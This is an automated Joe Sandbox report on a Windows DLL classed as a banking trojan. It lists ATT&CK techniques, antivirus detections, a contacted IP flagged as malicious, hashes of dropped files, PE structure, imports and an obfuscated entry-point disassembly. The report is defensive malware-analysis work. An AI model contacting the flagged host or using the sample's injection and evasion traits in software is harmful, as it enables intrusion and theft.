---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1 Valid Accounts | 1 Windows Management Instrumentation | 1 Valid Accounts | 1 Valid Accounts | 1 Obfuscated Files or Information | 1 Input Capture | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | Exfiltration Over Other Network Medium | 2 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 Data Encrypted for Impact |
Default Accounts | 3 Native API | Boot or Logon Initialization Scripts | 1 Access Token Manipulation | 1 File Deletion | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Email Collection | Exfiltration Over Bluetooth | 2 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | 1 Command and Scripting Interpreter | Logon Script (Windows) | 813 Process Injection | 1 Masquerading | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | 1 Input Capture | Automated Exfiltration | 1 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Valid Accounts | NTDS | 25 System Information Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 11 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Access Token Manipulation | LSA Secrets | 11 Security Software Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 31 Virtualization/Sandbox Evasion | Cached Domain Credentials | 31 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | 813 Process Injection | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 Rundll32 | Proc Filesystem | 1 Application Window Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue | |
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction | |
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | 11 Remote System Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact | ||
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Right-to-Left Override | Input Capture | 1 System Network Configuration Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | Service Stop |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
39% | Virustotal | Browse | ||
50% | ReversingLabs | Win32.Trojan.Jaik | ||
100% | Joe Sandbox ML |
⊘No Antivirus matches
Source | Detection | Scanner | Label | Link | Download |
---|---|---|---|---|---|
100% | Avira | HEUR/AGEN.1245293 | Download File |
⊘No Antivirus matches
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe |
⊘No contacted domains info
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown | |
true |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| low | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
185.189.151.28 | unknown | Switzerland | 51395 | AS-SOFTPLUSCH | true |
IP |
---|
192.168.2.1 |
Joe Sandbox Version: | 34.0.0 Boulder Opal |
Analysis ID: | 620331 |
Start date and time: 04/05/202216:25:03 | 2022-05-04 16:25:03 +02:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 12m 30s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | XoVzWJQAQ0.dll |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of analysed new started processes analysed: | 37 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 2 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.bank.troj.evad.winDLL@26/16@0/2 |
EGA Information: |
|
HDC Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 13.107.42.16
- Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, config.edge.skype.com.trafficmanager.net, store-images.s-microsoft.com, login.live.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, ctldl.windowsupdate.com, img-prod-cms-rt-microsoft-com.akamaized.net, l-0007.l-msedge.net, arc.msn.com, config.edge.skype.com
- Execution Graph export aborted for target mshta.exe, PID 4804 because there are no executed function
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description |
---|---|---|
16:26:11 | API Interceptor | |
16:26:49 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
185.189.151.28 | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse |
⊘No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
AS-SOFTPLUSCH | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
⊘No context
⊘No context
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 11606 |
Entropy (8bit): | 4.883977562702998 |
Encrypted: | false |
SSDEEP: | 192:h9smd3YrKkGdcU6CkVsm5emla9sm5ib4q4dVsm5emdjxoeRjp5Kib4nVFn3eGOVo:ySib4q4dvEib4nVoGIpN6KQkj2frkjhQ |
MD5: | 243581397F734487BD471C04FB57EA44 |
SHA1: | 38CB3BAC7CDC67CB3B246B32117C2C6188243E77 |
SHA-256: | 7EA86BC5C164A1B76E3893A6C1906B66A1785F366E092F51B1791EC0CC2AAC90 |
SHA-512: | 1B0B1CD588E5621F63C4AACC8FF4C111AD9148D4BABE65965EC38EBD10D559A0DFB9B610CA3DF1E1DD7B1842B3E391D6804A3787B6CD00D527A660F444C4183A |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.1117426676935867 |
Encrypted: | false |
SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry8ak7YnqqyPN5Dlq5J:+RI+ycuZhNqakSyPNnqX |
MD5: | 81A736AC827123F39B6359777F5E5BBD |
SHA1: | 0F2A64DBADDE3ABBCDDF1B17A1DE7BA41BE6CD55 |
SHA-256: | DB505E64229027A77C2819094BA11750F878CED1B4F23819525207048CE5D0E7 |
SHA-512: | 158372042033EF3A0237E1EB7C2F749555EAAA29BFE6918127136C6224BC0F65677ED40A9ED275A2982DD9B24A27C04B8988E67C4BB72026DCB12311E9F9D163 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.103509438315902 |
Encrypted: | false |
SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grygkak7YnqqjpPN5Dlq5J:+RI+ycuZhN7akStPNnqX |
MD5: | 1AF6050D45F0118CF9A5B77EC990A0EA |
SHA1: | 766FB109DD78AE9FBBA39D181C05B75F4B9B4D53 |
SHA-256: | F6C2D364DBB3E043831928F78C9B6971CB3449141F7AD81B08B16AFA7214A16F |
SHA-512: | 732241A37E7F241A4D7219B3E6D17842400500CDE1D136EC18AFD7867FB09E474D34DCD39638D6759F1626586C29A6EA4899C5B394A65152819AC40BE7C9ABB9 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1320 |
Entropy (8bit): | 3.9824475480583934 |
Encrypted: | false |
SSDEEP: | 24:HxnW91pCI7MhHVQhKdNWI+ycuZhN7akStPNnq9hgd:18pCuI1yKd41ul7a33q9y |
MD5: | 8D7B62E2FB8D62EEC206C1BDD4D84CF4 |
SHA1: | CF14D79B975022C0FD0B0B8E3DF22FF86CEBDAC9 |
SHA-256: | F009BFB82306048220092EC281AA86277A986B5A7DE65E5F3A3AC52AF6253F77 |
SHA-512: | FF600E585970531CF6CD09B0D6135E92B86E4CA73DC49DC290F04289AF678F1B271D0187D009E3C8CA26ECE4E968A4B9DCB67053DC4B293440EA60542EBBA7B9 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1320 |
Entropy (8bit): | 3.9934039832266293 |
Encrypted: | false |
SSDEEP: | 24:HRh6nW9r2XhH5hKdNWI+ycuZhNqakSyPNnq9hgd:MW2xnKd41ulqa3eq9y |
MD5: | 17AC15A18FC3FB762C4679863838E116 |
SHA1: | D9B5577D614DB878349EFD58E3FEA8021AE93B82 |
SHA-256: | B66B79700202020FA9205C28A5443DA3F40C09AC6B8D3FF6E14D093B85FCFFB3 |
SHA-512: | F2CB720CE1FE89216E3019647C92C65AFB0621148FDBA7AE8D105D1F7FA380CFD310DB849FCB9B98D3C2869461EBFA06E0AE724059F553E8D9D298B758A3CB2E |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 392 |
Entropy (8bit): | 4.988829579018284 |
Encrypted: | false |
SSDEEP: | 6:V/DsYLDS81zuJ6VMRSRa+eNMjSSRr92B7SSRNAtwy:V/DTLDfuk9eg5r9yeqy |
MD5: | 80545CB568082AB66554E902D9291782 |
SHA1: | D013E59DC494D017F0E790D63CEB397583DCB36B |
SHA-256: | E15CA20CFE5DE71D6F625F76D311E84240665DD77175203A6E2D180B43926E6C |
SHA-512: | C5713126B0CB060EDF4501FE37A876DAFEDF064D9A9DCCD0BD435143DAB7D209EFBC112444334627FF5706386FB2149055030FCA01BA9785C33AC68E268B918D |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 351 |
Entropy (8bit): | 5.296878990077811 |
Encrypted: | false |
SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23f9Szxs7+AEszIWXp+N23f91x:p37Lvkmb6KH1SWZE81X |
MD5: | CA7BF0117043C777407779138BC196D6 |
SHA1: | 1730939F55EE070B21B5CCB511B42CEE36D39917 |
SHA-256: | A7EC919AEB3C1D91AB60C780CF7F96AE14C3B5891975067A6B0459C40F1AC13A |
SHA-512: | 33639558DC6ED73B7F7F132147AE7DEF4D748479C51BCB50CB2BF02FDD19BA2F50C8DC958C2B49961A2D279707557940EBEB7B2E07B40EB2B81BEB02A40985F3 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.5954695100905196 |
Encrypted: | false |
SSDEEP: | 24:etGS9/u2Bg85z7xlfwZD6MgdWqtkZfw/WI+ycuZhNqakSyPNnq:6QYb5hFCD6lWdJwu1ulqa3eq |
MD5: | 3FA05E8CA29FC933EE62D95D319196F4 |
SHA1: | 67950CB77C6C396B7CFA0A0298121D5E3DA46884 |
SHA-256: | 32047EECD93791D81841F92A215EA93F8D440AF4CEAF5F4F81218B16B04AA651 |
SHA-512: | 333579733B7534821166910F0F01F68E750AD5037DE0820C39066AFB2ABDADE7D508EC8F7CECBA28D64FD0F2798366EDB8E2DC283EC73D0DE48ECB3417965C4E |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 848 |
Entropy (8bit): | 5.341443763648944 |
Encrypted: | false |
SSDEEP: | 24:AId3ka6KH1DE81eKaM5DqBVKVrdFAMBJTH:Akka6ApE8wKxDcVKdBJj |
MD5: | 64FC9FE15499D831A5DF89DAB5CB482D |
SHA1: | B84EC157DD794CF98DD0962F145A5EA06ADC1908 |
SHA-256: | CC8EB0375870D71E1D9717D30B1116D98073F09AEF2CB35B5E52A4606208ECC0 |
SHA-512: | 4E09F378EB5AB87C890099EDEE500E989BA976F74A48C6B354E76A3BD9F886F9A1958A4F82806219813D2C90003F03A50344E630689B474F8465BF29B15FF941 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 403 |
Entropy (8bit): | 5.058106976759534 |
Encrypted: | false |
SSDEEP: | 6:V/DsYLDS81zuJiWmMRSR7a1nQTsyBSRa+rVSSRnA/fpM+y:V/DTLDfuQWMBDw9rV5nA/3y |
MD5: | 99BD08BC1F0AEA085539BBC7D61FA79D |
SHA1: | F2CA39B111C367D147609FCD6C811837BE2CE9F3 |
SHA-256: | 8DFF0B4F90286A240BECA27EDFC97DCB785B73B8762D3EAE7C540838BC23A3E9 |
SHA-512: | E27A0BF1E73207800F410BA9399F1807FBA940F82260831E43C8F0A8B8BFA668616D63B53755526236433396AF4EF21E1EB0DFA9E92A0F34DB8A14C292660396 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 351 |
Entropy (8bit): | 5.263540312571727 |
Encrypted: | false |
SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23f4UQjGzxs7+AEszIWXp+N23f4UQjb:p37Lvkmb6KHQUQjGWZE8QUQjb |
MD5: | 477ACFF0C9318FD1D57EB124DD1CB3A1 |
SHA1: | C242FD81B3CA732BAE16741B42A184555DEF96E9 |
SHA-256: | 3D341688B0354573EA4C9332F2BC9CA27D2DA741367596542A508A138B1FE075 |
SHA-512: | 7A296532E591C4CD9FD5EE0646714641B3E345F9FCB72F51A06D7EAB4B975AA2F6E3F64CA212253DEDE1E74901A9A741C64C1D95AEAF5F7E20D49C01315BC41A |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.6194715442407794 |
Encrypted: | false |
SSDEEP: | 24:etGS08OmU0t3lm85xWAseO4z05Q64pfUPtkZfR940VUWI+ycuZhN7akStPNnq:6OXQ3r5xNOdQfUuJD4s31ul7a33q |
MD5: | 25BFE19F5986DCBA41CF9C32255099CB |
SHA1: | 72C5BA8E1E513BDF107844B644E93EACB835EEE5 |
SHA-256: | 76E736E89441E0448FAD32891FC3E2C56E03489D8C1D93EFFCE717FE29864A27 |
SHA-512: | A8CB76EE9E312B8E48A3D3FD34AD262316544F38700AF6E4BACE1030B40DAD5D70C1F1BDC4DCF41C474F8FCE6FBE5F450FFF39D0D5A5052D41412F7949689114 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 848 |
Entropy (8bit): | 5.3358411405116986 |
Encrypted: | false |
SSDEEP: | 24:AId3ka6KHBoE8BnKaM5DqBVKVrdFAMBJTH:Akka6ABoE8BnKxDcVKdBJj |
MD5: | BBF9AF951E167FF72BC18FEE6E40D104 |
SHA1: | 95CC2C7CABE3C97A41E1F3FB03F49C77D68C8004 |
SHA-256: | B4F8937851B30FC1378EA0F64F5BB5D58F8C8E6D2FFA28BE818292269E69713E |
SHA-512: | 4AA72DD4100CF01CBECAAE9918598E60D19898E5B30BC7B87A25656AB1EFC734CD87F6BBBC838C0E843F0E22923C5B7095A97D987BC7660D492480BFC8633EF7 |
Malicious: | false |
Preview: |
C:\Users\user\Documents\20220504\PowerShell_transcript.688098.e0lviBuJ.20220504162647.txt
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1355 |
Entropy (8bit): | 5.379018260547288 |
Encrypted: | false |
SSDEEP: | 24:BxSAB6xvBn1Zx2DOXUW0j2LCH1c4qW+HjeTKKjX4CIym1ZJXJBj2LCH1c4NenxS7:BZovh/oOsJ1c4t+qDYB1ZZJ1c4aZZpC |
MD5: | 82ED31B7989163CA4F97487D125F8090 |
SHA1: | F8AA109361CA6BAB2D8A076E6567C452C62C7D8F |
SHA-256: | FA90D37462B816EBEDC2BCC4AFF455B582FF43596073690DE7DC1834B68A1E9F |
SHA-512: | 87E4259453324C28D55561DC04D75ACD5C9E5918B6EB908B4A1339637AC9A6C950512D14A4D4E7C39AF173CAE606FC8AF987B131E4A2294B8262A48D8535C4DA |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 7.238623900640168 |
TrID: |
|
File name: | XoVzWJQAQ0.dll |
File size: | 442368 |
MD5: | 81bdb4c3b30de72ad49b98a4977063c4 |
SHA1: | 2b173296dd75395b37d7c5775dd16003c2349a19 |
SHA256: | 9c2a2b8d88ab02d37e21c9b97f10b26543daedf353ce76c17b445688b0a041d6 |
SHA512: | d4289d9a23e1b26dcc1a9977cb1b784903e8163b8f439e848e5eb91f5af19d9c506cb9ae02ab33f27557fa245dcd62392f521e22a26aae2019f1dc374548e782 |
SSDEEP: | 6144:ripWDjyexlJJtyhOhevp/D23qAGzjLg8O9YTEqT2uGRp1WgHyo3NldzlQgOsnGWU:ripsFlJqYhiVDwGU8OqaX1WW3zNg7 |
TLSH: | 1794F14977A11DBBEC0807760CF8C51B9B66BE2CA23A34DEA6683CFF7E175511048706 |
File Content Preview: | MZ......................@.......................................<dR.x.<.x.<.x.<.c.....<.uW....<.x.=...<..|....<.{}....<..X?...<.....-.<.{}.._.<..\<...<.Richx.<.PE..L......A...........!.........P......0.............@.................................5...... |
Icon Hash: | 9068eccc64f6e2ad |
Entrypoint: | 0x401430 |
Entrypoint Section: | .text |
Digitally signed: | false |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL |
DLL Characteristics: | TERMINAL_SERVER_AWARE |
Time Stamp: | 0x411096D1 [Wed Aug 4 07:57:05 2004 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 5 |
OS Version Minor: | 0 |
File Version Major: | 5 |
File Version Minor: | 0 |
Subsystem Version Major: | 5 |
Subsystem Version Minor: | 0 |
Import Hash: | 0bedc9af0ed7cf2ba33cf662a24d448e |
Instruction |
---|
push ebp |
mov ebp, esp |
add ecx, FFFFFFFFh |
call 00007F5FDC7372ACh |
pop eax |
pop eax |
mov dword ptr [00414544h], eax |
mov edx, dword ptr [00414660h] |
sub edx, 00005289h |
call edx |
ret |
int3 |
push esi |
mov eax, ebx |
mov dword ptr [00414540h], eax |
pop dword ptr [00414538h] |
mov dword ptr [00414548h], ebp |
mov dword ptr [0041453Ch], edi |
sub dword ptr [00414548h], FFFFFFFCh |
loop 00007F5FDC737255h |
mov dword ptr [ebp+00h], eax |
nop |
push esp |
stc |
iretd |
inc ebp |
push eax |
out dx, eax |
add ebx, dword ptr [edx+75606DC0h] |
imul edx, dword ptr [ebx-75h], 3Ah |
push es |
pop edi |
pop es |
sbb dword ptr [edi+56h], esi |
and al, 02h |
or ah, cl |
retn 0C85h |
sub byte ptr [ecx], bh |
movsb |
jnbe 00007F5FDC737261h |
in al, 3Eh |
jmp 00007F5FDC737283h |
push esp |
movsx esi, byte ptr [ebp+edi*4+5Ah] |
xor al, 82h |
add dword ptr [edx-59BC99ECh], 36h |
ret |
aam 85h |
popad |
jnbe 00007F5FDC737265h |
scasb |
movsd |
sub dword ptr [esi-47h], FFFFFF93h |
push esp |
mov eax, dword ptr [A67A61FCh] |
cli |
jnp 00007F5FDC737247h |
xlatb |
xchg eax, ebp |
fsubr qword ptr [esi-64h] |
add bh, byte ptr [ebp-06h] |
out dx, al |
jne 00007F5FDC7372D7h |
les eax, fword ptr [eax] |
sbb edx, dword ptr [eax-08h] |
leave |
push edi |
mov dword ptr [AC4BEBDEh], eax |
in eax, dx |
in al, dx |
aaa |
mov al, byte ptr [6B343226h] |
mov edx, BF543853h |
push eax |
inc ebx |
sbb ecx, dword ptr [esi+eax*4] |
push ebp |
dec ebp |
imul ebp, edi, 000000BDh |
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xdc18 | 0x8c | .rdata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x62000 | 0x9f28 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6c000 | 0xf0c | .reloc |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xd0b0 | 0x38 | .rdata |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0xd000 | 0xb0 | .rdata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x1000 | 0x1 | .text |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0xb710 | 0xc000 | False | 0.0735880533854 | data | 1.02142305417 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
.rdata | 0xd000 | 0x1073 | 0x2000 | False | 0.180419921875 | data | 3.71608775679 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0xf000 | 0x79d0 | 0x6000 | False | 0.373819986979 | data | 6.02758758015 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.crt | 0x17000 | 0x1dc8e | 0x1e000 | False | 0.988427734375 | data | 7.9815287954 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.erloc | 0x35000 | 0x2ca4f | 0x2d000 | False | 0.988259548611 | data | 7.98122243943 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.rsrc | 0x62000 | 0x9f28 | 0xa000 | False | 0.602783203125 | data | 6.51663069246 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.reloc | 0x6c000 | 0x132e | 0x2000 | False | 0.219360351562 | data | 3.73577949218 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country |
---|---|---|---|---|---|
RT_BITMAP | 0x62360 | 0x666 | data | English | United States |
RT_ICON | 0x629c8 | 0x485d | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States |
RT_ICON | 0x67228 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 331218944, next used block 4106092544 | English | United States |
RT_ICON | 0x697d0 | 0xea8 | data | English | United States |
RT_ICON | 0x6a678 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States |
RT_ICON | 0x6af20 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States |
RT_DIALOG | 0x6b488 | 0xb4 | data | English | United States |
RT_DIALOG | 0x6b540 | 0x120 | data | English | United States |
RT_DIALOG | 0x6b660 | 0x158 | data | English | United States |
RT_DIALOG | 0x6b7b8 | 0x202 | data | English | United States |
RT_DIALOG | 0x6b9c0 | 0xf8 | data | English | United States |
RT_DIALOG | 0x6bab8 | 0xa0 | data | English | United States |
RT_DIALOG | 0x6bb58 | 0xee | data | English | United States |
RT_GROUP_ICON | 0x6bc48 | 0x4c | data | English | United States |
RT_VERSION | 0x6bc98 | 0x290 | MS Windows COFF PA-RISC object file | English | United States |
DLL | Import |
---|---|
KERNEL32.dll | EraseTape, GetDiskFreeSpaceExA, lstrlenA, LocalHandle, GetModuleFileNameA, GetBinaryTypeA, GetThreadLocale, GetFileTime, GlobalFlags, GetStringTypeA, EnumResourceTypesA, GetConsoleCP, GetCommTimeouts, WriteProcessMemory, GlobalMemoryStatus, DebugBreak |
OLEAUT32.dll | GetRecordInfoFromTypeInfo, LoadTypeLibEx |
USER32.dll | DefMDIChildProcW, GetMenuItemRect, MessageBoxIndirectW, DeleteMenu, GetClassNameA, GetMessagePos, GetUpdateRgn, GetClientRect, GetScrollBarInfo |
GDI32.dll | ExtSelectClipRgn, GetBkColor, GetCharWidthFloatA, GetTextMetricsW, GdiComment |
ADVAPI32.dll | EnumServicesStatusExW, InitiateSystemShutdownExW, RegGetValueA |
msvcrt.dll | strcoll, fgetwc, srand |
Description | Data |
---|---|
LegalCopyright | A Company. All rights reserved. |
InternalName | |
FileVersion | 1.0.0.0 |
CompanyName | A Company |
ProductName | |
